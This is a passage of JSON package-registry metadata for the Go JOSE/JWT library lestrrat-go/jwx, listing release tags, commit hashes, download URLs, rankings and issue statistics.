4:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.11/manifests"},{"name":"v1.2.10","sha":"09a4d070eb0ec840a33597a67a17e6cddb53da87","kind":"commit","published_at":"2021-11-09T09:16:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.10/manifests"},{"name":"v1.2.9","sha":"b2da2238b7b342a8889470b901ef3024dfc0712a","kind":"commit","published_at":"2021-10-26T01:00:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.9/manifests"},{"name":"v1.2.8","sha":"f2bdd8c9df46d61fe987fa36bcc87c58ef846046","kind":"commit","published_at":"2021-10-21T01:23:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.8/manifests"},{"name":"v1.2.7","sha":"b9292016a6572dce779109d8da8d813b85abb658","kind":"commit","published_at":"2021-09-26T06:08:18.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.7/manifests"},{"name":"v1.2.6","sha":"41b30b67e905482292496e528119fc7482482ab3","kind":"commit","published_at":"2021-08-24T07:56:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.6/manifests"},{"name":"v1.2.5","sha":"551083cda79fd07493bf0db6e825278dd88c1fc3","kind":"commit","published_at":"2021-08-04T12:17:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.5/manifests"},{"name":"v1.2.4","sha":"d01528f5e5ae3221a48f67570928867e98184bbd","kind":"commit","published_at":"2021-07-15T13:26:23.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.4/manifests"},{"name":"v1.2.3","sha":"5e2de6ea11b5112bdf1a5e088d56c9c2e7fb6807","kind":"commit","published_at":"2021-07-15T09:53:13.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.3/manifests"},{"name":"v1.2.2","sha":"7159c501c5a43f8788f3a9a0961e146480c28eae","kind":"commit","published_at":"2021-07-12T23:38:00.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.2/manifests"},{"name":"v1.2.1","sha":"08de34253bc9633a11b019b143a2d212f8ff0ed8","kind":"commit","published_at":"2021-06-01T23:24:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"20fcd2aaea33121a0da375914a254615b3527c46","kind":"commit","published_at":"2021-04-29T23:40:49.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.0/manifests"},{"name":"v1.1.8-rc1","sha":"4fc7156e9562e4b51143220e830ed2d32279d2f6","kind":"commit","published_at":"2021-04-08T12:05:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.8-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.8-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.8-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.8-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.8-rc1/manifests"},{"name":"v1.1.7","sha":"db72eadbbe21fa7dc37d5628acfaa803fbf7d96e","kind":"commit","published_at":"2021-04-02T13:09:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7/manifests"},{"name":"v1.1.7-rc1","sha":"afd2d647f5892a70ab72ee14e9985ab5028bfb23","kind":"commit","published_at":"2021-03-31T06:49:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.7-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.7-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.7-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7-rc1/manifests"},{"name":"v1.1.6","sha":"df21963ac28051061a86f9c0e9671800312e6f18","kind":"commit","published_at":"2021-03-28T07:55:51.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"b2a7484c0e863f2730d3a7a79ade1deed9e85e13","kind":"commit","published_at":"2021-03-12T04:23:47.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5/manifests"},{"name":"v1.1.5-rc1","sha":"c9a7b177e98db06f4fcd57b90ddaeab8d436e0a9","kind":"commit","published_at":"2021-03-02T22:19:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.5-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.5-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.5-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5-rc1/manifests"},{"name":"v1.1.4","sha":"db48a5c54e2bf7d069a170de798d6bc914dae96d","kind":"commit","published_at":"2021-03-01T21:47:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"a7162536a2a50e66cc69bab0e4deb403e3f1fdc0","kind":"commit","published_at":"2021-02-22T08:42:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"a7f076fc6eadb44380d41b5e30eb5a85a91de864","kind":"commit","published_at":"2021-02-16T10:05:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"451a45cc212f752fa0011e64d8042ec87f0762df","kind":"commit","published_at":"2021-02-05T02:01:14.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"7f69ac971a6fd1cff28abadfe1e654f33004a19a","kind":"commit","published_at":"2021-01-31T07:52:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.0/manifests"},{"name":"v1.0.8","sha":"3bb9a18ceb5f45ffc4d0b837f85a5c3eb3f0bbfe","kind":"commit","published_at":"2021-01-14T23:41:30.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.8/manifests"},{"name":"v1.0.7","sha":"36d0cd5770ba08f66232bc143fd26856c258f27b","kind":"commit","published_at":"2021-01-11T10:52:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.7/manifests"},{"name":"v1.0.6","sha":"d4cb6651f457177451df330a37eaa0af4c7476a0","kind":"commit","published_at":"2020-12-16T21:36:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.6/manifests"},{"name":"v1.0.5","sha":"5aeabd78da3bab07a0ae04d299575f967590380e","kind":"commit","published_at":"2020-09-28T08:03:15.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"3d8cae88e8782b73d109e2cf66603b76826dd079","kind":"commit","published_at":"2020-08-14T13:41:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"3294517bae6989c5e89b00d0f72d79667d098942","kind":"commit","published_at":"2020-07-08T07:05:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.3/manifests"},{"name":"v1.0.2","sha":"d173045330f3e507d1d34b7fa622763dd744ecd6","kind":"commit","published_at":"2020-05-07T12:10:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"9969e2cb3255455a4a6b8a6da164bf80877155ef","kind":"commit","published_at":"2020-05-04T05:46:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5e17c3a031d6fb0962f929adcc3effc6dbb9f102","kind":"commit","published_at":"2020-05-03T03:30:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.0/manifests"},{"name":"v0.9.2","sha":"1402056cec6d7faba7454657f7bf180b2b1f14d5","kind":"commit","published_at":"2020-04-13T03:20:24.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"041c40732a8843e7d4a0b7cd2cffbe2f339f92ca","kind":"commit","published_at":"2020-02-26T22:25:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"5d60d87d07ddea9874404944870bec81aabcf574","kind":"commit","published_at":"2019-05-20T02:55:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-03-25T17:02:57.907Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":9.345852080216646,"dependent_packages_count":6.999148183520997,"stargazers_count":1.0929961382075044,"forks_count":1.4345083313038627,"average":4.718126183312252},"purl":"pkg:golang/github.com/lestrrat-go/jwx/jwe/internal/cmd/genheader","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/jwe/internal/cmd/genheader","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/jwe/internal/cmd/genheader","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwx/jwe/internal/cmd/genheader/dependencies","status":null,"funding_links":["https://github.com/sponsors/lestrrat"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-23T10:02:05.442Z","issues_count":94,"pull_requests_count":747,"avg_time_to_close_issue":3354245.694117647,"avg_time_to_close_pull_request":304118.8680351906,"issues_closed_count":85,"pull_requests_closed_count":682,"pull_request_authors_count":27,"issue_authors_count":64,"avg_comments_per_issue":3.978723404255319,"avg_comments_per_pull_request":0.5903614457831325,"merged_pull_requests_count":577,"bot_issues_count":1,"bot_pull_requests_count":372,"past_year_issues_count":13,"past_year_pull_requests_count":196,"past_year_avg_time_to_close_issue":210964.44444444444,"past_year_avg_time_to_close_pull_request":191349.9512195122,"past_year_issues_closed_count":9,"past_year_pull_requests_closed_count":164,"past_year_pull_request_authors_count":10,"past_year_issue_authors_count":11,"past_year_avg_comments_per_issue":2.923076923076923,"past_year_avg_comments_per_pull_request":0.2857142857142857,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":80,"past_year_merged_pull_requests_count":143,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/issues","maintainers":[{"login":"lestrrat","count":345,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}],"active_maintainers":[{"login":"lestrrat","count":104,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjwe%2Finternal%2Fcmd%2Fgenheader/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjwe%2Finternal%2Fcmd%2Fgenheader/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjwe%2Finternal%2Fcmd%2Fgenheader/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjwe%2Finternal%2Fcmd%2Fgenheader/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjwe%2Finternal%2Fcmd%2Fgenheader/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjwe%2Finternal%2Fcmd%2Fgenheader/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":12606988,"name":"github.com/LeStrrat-go/jwx/v2","ecosystem":"go","description":null,"homepage":null,"licenses":"mit","normalized_licenses":["MIT"],"repository_url":"https://github.com/LeStrrat-go/jwx","keywords_array":[],"namespace":null,"versions_count":32,"first_release_published_at":"2022-04-03T23:49:46.000Z","latest_release_published_at":"2025-04-29T08:17:11.000Z","latest_release_number":"v2.1.6","last_synced_at":"2026-06-01T17:46:00.633Z","created_at":"2025-12-20T10:39:06.519Z","updated_at":"2026-06-01T17:46:00.633Z","registry_url":"https://pkg.go.dev/github.com/LeStrrat-go/jwx/v2","install_command":"go get github.com/LeStrrat-go/jwx/v2","documentation_url":"https://pkg.go.dev/github.com/LeStrrat-go/jwx/v2#section-documentation","metadata":{},"repo_metadata":{"id":37406150,"uuid":"45516769","full_name":"lestrrat-go/jwx","owner":"lestrrat-go","description":"Complete implementation of JWx (Javascript Object Signing and Encryption/JOSE) technologies for Go. #golang #jwt #jws #jwk #jwe","archived":false,"fork":false,"pushed_at":"2026-03-23T20:34:17.000Z","size":21587,"stargazers_count":2339,"open_issues_count":5,"forks_count":192,"subscribers_count":24,"default_branch":"develop/v3","last_synced_at":"2026-03-24T15:23:41.313Z","etag":null,"topics":["go","golang","jwe","jwk","jws","jwt","oidc"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lestrrat-go.png","metadata":{"files":{"readme":"README.md","changelog":"Changes","contributing":".github/CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","dco":null,"cla":null},"funding":{"github":["lestrrat"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-11-04T05:12:52.000Z","updated_at":"2026-03-23T20:34:22.000Z","dependencies_parsed_at":"2023-09-23T13:31:33.054Z","dependency_job_id":"8122a1a4-053c-4ee5-9b97-9972c16335ef","html_url":"https://github.com/lestrrat-go/jwx","commit_stats":{"total_commits":1692,"total_committers":66,"mean_commits":"25.636363636363637","dds":0.3427895981087471,"last_synced_commit":"f0730766974533dcd9e5f8074a0adfcc471b